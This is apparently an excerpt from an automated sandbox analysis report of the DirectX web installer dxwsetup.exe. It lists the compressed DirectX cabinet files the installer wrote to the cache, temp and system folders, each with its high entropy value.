                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Feb2007_xact_x64.cab entropy: 7.99592167011Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS46A2D3.tmp\Feb2007_xact_x64.cab entropy: 7.99592167011Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\FEB2007_XACT_x64[1].cab entropy: 7.99592167011Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Feb2007_xact_x86.cab entropy: 7.99397256556Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS469D26.tmp\Feb2007_xact_x86.cab entropy: 7.99397256556Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\FEB2007_XACT_x86[1].cab entropy: 7.99397256556Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Dec2006_xact_x64.cab entropy: 7.99761851304Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Dec2006_xact_x86.cab entropy: 7.9939423459Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Jun2007_d3dx9_34_x86[1].cab entropy: 7.99906642826Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS4528C5.tmp\Jun2007_d3dx9_34_x86.cab entropy: 7.99906642826Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Jun2007_d3dx9_34_x86.cab entropy: 7.99906642826Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\Apr2007_d3dx10_33_x86[1].cab entropy: 7.99896802841Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS452153.tmp\Apr2007_d3dx10_33_x86.cab entropy: 7.99896802841Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Apr2007_d3dx10_33_x86.cab entropy: 7.99896802841Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Apr2007_xact_x64.cab entropy: 7.99671826657Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Apr2007_xact_x86.cab entropy: 7.99449196682Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS46B9B6.tmp\Apr2007_xact_x86.cab entropy: 7.99449196682Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\APR2007_XACT_x86[1].cab entropy: 7.99449196682Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Apr2007_d3dx10_33_x64.cab entropy: 7.99956097649Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS46B273.tmp\Apr2007_d3dx10_33_x64.cab entropy: 7.99956097649Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\Apr2007_d3dx10_33_x64[1].cab entropy: 7.99956097649Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Apr2007_d3dx9_33_x64.cab entropy: 7.99980407083Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS46A89F.tmp\Apr2007_d3dx9_33_x64.cab entropy: 7.99980407083Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS46BF54.tmp\Apr2007_xact_x64.cab entropy: 7.99671826657Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\APR2007_XACT_x64[1].cab entropy: 7.99671826657Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS46DD5B.tmp\Jun2007_xact_x64.cab entropy: 7.99632463398Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\JUN2007_XACT_x64[1].cab entropy: 7.99632463398Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS46D685.tmp\Jun2007_xact_x86.cab entropy: 7.99490970306Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\JUN2007_XACT_x86[1].cab entropy: 7.99490970306Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Jun2007_d3dx10_34_x64.cab entropy: 7.99954275121Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS46CF03.tmp\Jun2007_d3dx10_34_x64.cab entropy: 7.99954275121Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\Jun2007_d3dx10_34_x64[1].cab entropy: 7.99954275121Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Jun2007_d3dx9_34_x64.cab entropy: 7.99979539491Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS46C53F.tmp\Jun2007_d3dx9_34_x64.cab entropy: 7.99979539491Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\Jun2007_d3dx9_34_x64[1].cab entropy: 7.99979539491Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Jun2007_xact_x86.cab entropy: 7.99490970306Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\Jun2007_d3dx10_34_x86[1].cab entropy: 7.9989902264Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS4532A9.tmp\Jun2007_d3dx10_34_x86.cab entropy: 7.9989902264Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Jun2007_xact_x64.cab entropy: 7.99632463398Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Jun2007_d3dx10_34_x86.cab entropy: 7.9989902264Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\Aug2007_d3dx9_35_x86[1].cab entropy: 7.9991869164Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS4539AE.tmp\Aug2007_d3dx9_35_x86.cab entropy: 7.9991869164Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Aug2007_d3dx9_35_x86.cab entropy: 7.9991869164Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\Aug2007_d3dx10_35_x86[1].cab entropy: 7.9986813742Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS4543EF.tmp\Aug2007_d3dx10_35_x86.cab entropy: 7.9986813742Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Aug2007_d3dx10_35_x86.cab entropy: 7.9986813742Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Nov2007_d3dx9_36_x86[1].cab entropy: 7.99907865291Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS454B80.tmp\Nov2007_d3dx9_36_x86.cab entropy: 7.99907865291Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Nov2007_d3dx9_36_x86.cab entropy: 7.99907865291Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\Nov2007_d3dx10_36_x86[1].cab entropy: 7.99885807363Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS4555B1.tmp\Nov2007_d3dx10_36_x86.cab entropy: 7.99885807363Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Nov2007_d3dx10_36_x86.cab entropy: 7.99885807363Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\Mar2008_d3dx9_37_x86[1].cab entropy: 7.99972380205Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS455D62.tmp\Mar2008_d3dx9_37_x86.cab entropy: 7.99972380205Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Mar2008_d3dx9_37_x86.cab entropy: 7.99972380205Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\Mar2008_d3dx10_37_x86[1].cab entropy: 7.99894945695Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS4566A9.tmp\Mar2008_d3dx10_37_x86.cab entropy: 7.99894945695Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Mar2008_d3dx10_37_x86.cab entropy: 7.99894945695Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Jun2008_d3dx9_38_x86[1].cab entropy: 7.99972642235Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS456E3B.tmp\Jun2008_d3dx9_38_x86.cab entropy: 7.99972642235Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Jun2008_d3dx9_38_x86.cab entropy: 7.99972642235Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\Jun2008_d3dx10_38_x86[1].cab entropy: 7.99898013077Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS4577C0.tmp\Jun2008_d3dx10_38_x86.cab entropy: 7.99898013077Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Jun2008_d3dx10_38_x86.cab entropy: 7.99898013077Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\Aug2008_d3dx9_39_x86[1].cab entropy: 7.9996829971Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS457F71.tmp\Aug2008_d3dx9_39_x86.cab entropy: 7.9996829971Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Aug2008_d3dx9_39_x86.cab entropy: 7.9996829971Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\Aug2008_d3dx10_39_x86[1].cab entropy: 7.99888618458Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS458925.tmp\Aug2008_d3dx10_39_x86.cab entropy: 7.99888618458Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Aug2008_d3dx10_39_x86.cab entropy: 7.99888618458Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Nov2008_d3dx9_40_x86[1].cab entropy: 7.99964527898Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS459098.tmp\Nov2008_d3dx9_40_x86.cab entropy: 7.99964527898Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Nov2008_d3dx9_40_x86.cab entropy: 7.99964527898Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\Nov2008_d3dx10_40_x86[1].cab entropy: 7.99901184706Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS459A9A.tmp\Nov2008_d3dx10_40_x86.cab entropy: 7.99901184706Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Nov2008_d3dx10_40_x86.cab entropy: 7.99901184706Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\Mar2009_d3dx9_41_x86[1].cab entropy: 7.99977242309Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS45A25A.tmp\Mar2009_d3dx9_41_x86.cab entropy: 7.99977242309Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Mar2009_d3dx9_41_x86.cab entropy: 7.99977242309Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\Mar2009_d3dx10_41_x86[1].cab entropy: 7.99875716031Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS45AC2E.tmp\Mar2009_d3dx10_41_x86.cab entropy: 7.99875716031Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Mar2009_d3dx10_41_x86.cab entropy: 7.99875716031Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Aug2009_d3dx9_42_x86[1].cab entropy: 7.99947517428Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS45B47B.tmp\Aug2009_d3dx9_42_x86.cab entropy: 7.99947517428Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Aug2009_d3dx9_42_x86.cab entropy: 7.99947517428Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\Aug2009_d3dx10_42_x86[1].cab entropy: 7.99617858979Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS45BBCE.tmp\Aug2009_d3dx10_42_x86.cab entropy: 7.99617858979Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Aug2009_d3dx10_42_x86.cab entropy: 7.99617858979Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\Aug2009_d3dx11_42_x86[1].cab entropy: 7.99133262696Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS45C17B.tmp\Aug2009_d3dx11_42_x86.cab entropy: 7.99133262696Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Aug2009_d3dx11_42_x86.cab entropy: 7.99133262696Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\Aug2009_d3dcsx_42_x86[1].cab entropy: 7.99929609474Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\dxupdate[1].cab entropy: 7.99005571784Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS4431D3.tmp\dxupdate.cab entropy: 7.99005571784Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\dxupdate.cab entropy: 7.99005571784Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\Dec2006_d3dx10_00_x86[1].cab entropy: 7.99660427625Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS44AABC.tmp\Dec2006_d3dx10_00_x86.cab entropy: 7.99660427625Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Dec2006_d3dx10_00_x86.cab entropy: 7.99660427625Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\Dec2006_d3dx10_00_x64[1].cab entropy: 7.99694629492Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS44B115.tmp\Dec2006_d3dx10_00_x64.cab entropy: 7.99694629492Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Dec2006_d3dx10_00_x64.cab entropy: 7.99694629492Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\Feb2005_d3dx9_24_x86[1].cab entropy: 7.99897272471Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS44C633.tmp\Feb2005_d3dx9_24_x86.cab entropy: 7.99897272471Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Feb2005_d3dx9_24_x86.cab entropy: 7.99897272471Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\Apr2005_d3dx9_25_x86[1].cab entropy: 7.99907513517Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS44CEBF.tmp\Apr2005_d3dx9_25_x86.cab entropy: 7.99907513517Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Apr2005_d3dx9_25_x86.cab entropy: 7.99907513517Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\Jun2005_d3dx9_26_x86[1].cab entropy: 7.99904021782Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS44D7E6.tmp\Jun2005_d3dx9_26_x86.cab entropy: 7.99904021782Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Jun2005_d3dx9_26_x86.cab entropy: 7.99904021782Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Aug2005_d3dx9_27_x86[1].cab entropy: 7.99913898215Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS44E014.tmp\Aug2005_d3dx9_27_x86.cab entropy: 7.99913898215Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Aug2005_d3dx9_27_x86.cab entropy: 7.99913898215Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\Dec2005_d3dx9_28_x86[1].cab entropy: 7.99912186515Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS44E851.tmp\Dec2005_d3dx9_28_x86.cab entropy: 7.99912186515Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Dec2005_d3dx9_28_x86.cab entropy: 7.99912186515Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\Feb2006_d3dx9_29_x86[1].cab entropy: 7.99922866964Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS44F0FC.tmp\Feb2006_d3dx9_29_x86.cab entropy: 7.99922866964Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Feb2006_d3dx9_29_x86.cab entropy: 7.99922866964Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\Apr2006_d3dx9_30_x86[1].cab entropy: 7.99905051808Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS44F9C6.tmp\Apr2006_d3dx9_30_x86.cab entropy: 7.99905051808Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Apr2006_d3dx9_30_x86.cab entropy: 7.99905051808Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\OCT2006_d3dx9_31_x86[1].cab entropy: 7.99908172452Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS4504E2.tmp\Oct2006_d3dx9_31_x86.cab entropy: 7.99908172452Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Oct2006_d3dx9_31_x86.cab entropy: 7.99908172452Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\DEC2006_d3dx9_32_x86[1].cab entropy: 7.99909224767Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS450DAC.tmp\Dec2006_d3dx9_32_x86.cab entropy: 7.99909224767Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Dec2006_d3dx9_32_x86.cab entropy: 7.99909224767Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\Apr2007_d3dx9_33_x86[1].cab entropy: 7.99928426182Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS451741.tmp\Apr2007_d3dx9_33_x86.cab entropy: 7.99928426182Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Apr2007_d3dx9_33_x86.cab entropy: 7.99928426182Jump to dropped file

                          System Summary

                          barindex
